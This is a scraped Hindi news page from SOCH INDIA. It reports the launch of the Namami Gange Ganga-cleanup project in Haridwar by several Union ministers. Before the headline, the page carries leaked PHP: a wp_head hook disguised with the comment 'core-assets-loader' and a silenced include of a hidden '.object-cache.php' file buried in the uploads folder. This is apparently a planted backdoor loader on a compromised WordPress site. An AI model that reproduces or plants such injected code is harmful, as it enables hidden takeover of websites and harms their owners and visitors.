add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हरिद्वार में ‘नमामि गंगे’ प्रोजेक्ट लॉन्च, 3 केंद्रीय मंत्रियों ने किया शुभारंभ – SOCH INDIA
Menu

देश
हरिद्वार में ‘नमामि गंगे’ प्रोजेक्ट लॉन्च, 3 केंद्रीय मंत्रियों ने किया शुभारंभ

nobanner

हरिद्वार में ‘नमामि गंगे’ प्रोजेक्ट लॉन्च, 3 केंद्रीय मंत्रियों ने किया शुभारंभ

हरिद्वार: केंद्र सरकार की महत्वाकांक्षी योजना नमामि गंगे का शुभारंभ गुरुवार को हरिद्वार से हुआ। इस कार्यक्रम में गंगा को अविरल एवं निर्मल बनाने के लिए 2000 करोड़ रुपये की लागत वाली 300 परियोजनाओं की भी शुरुआत की गई। इस प्रोजेक्ट के तहत गंगा के किनारे बसे 400 गांवों को नमामि ग्राम के तहत डेवलप किया जाएगा। केंद्र सरकार के तीन मंत्रालयों के प्रभारी मंत्रियों उमा भारती, नितिन गडकरी और डॉ. महेश शर्मा ने इस परियोजना का शुभारंभ किया। कार्यक्रम में उत्तराखंड के मुख्यमंत्री हरीश रावत भी मौजूद रहे।

पांच गंगा बेसिन वाले राज्यों में शुरू की जा रही योजना
केंद्रीय जल संसाधन, नदी विकास और गंगा संरक्षण मंत्री उमा भारती ने बुधवार को बताया कि ये परियोजनाएं उत्तराखंड, उत्तर प्रदेश, बिहार, झारखंड, पश्चिम बंगाल, हरियाणा और दिल्ली में शुरू की जा रही हैं। इन परियोजनाओं में घाटों का नवीनीकरण, जलमल शोधन संयंत्र (एसटीपी) स्थापित करना, वृक्षारोपण एवं जैव विविधता संरक्षण शामिल है। यह योजना प्रारंभ में एक साथ 104 स्थानों पर सभी पांच गंगा बेसिन वाले राज्यों में शुरू की जायेगी।

सुरक्षा के विशेष बंदोबस्त
ईद के मौके पर आयोजित इस कार्यक्रम के लिए सुरक्षा के विशेष बंदोबस्त किए हैं। राष्ट्रीय स्वच्छ गंगा मिशन जल संसाधन, नदी विकास एवं गंगा संरक्षण मंत्रालय की ओर से आयोजित इस कार्यक्रम के साथ ही राज्य में केदारनाथ, बदरीनाथ, गंगोत्री, यमुनोत्री, रुद्रप्रयाग, श्रीनगर और देवप्रयाग में भी कार्यक्रम आयोजित किये गए। राष्ट्रीय स्वच्छ गंगा मिशन के सलाहकार संजय चतुर्वेदी ने बताया कि हरिद्वार में आयोजित नमामि गंगे के मुख्य कार्यक्रम में मुख्यमंत्री हरीश रावत, जल संसाधन एवं गंगा पुनरुद्धार मंत्री उमा भारती, केंद्रीय सड़क, परिवहन, राजमार्ग मंत्री नितिन गडकरी, इस्पात मंत्री वीरेंद्र सिंह, केंद्रीय पर्यटन व संस्कृति राज्य मंत्री डॉ. महेश शर्मा आए हैं। इसके अलावा स्थानीय सांसद रमेश पोखरियाल निशंक और शहर विधायक मदन कौशिक सहित कई अन्य गणमान्य लोग व संत भी मौजूद हैं।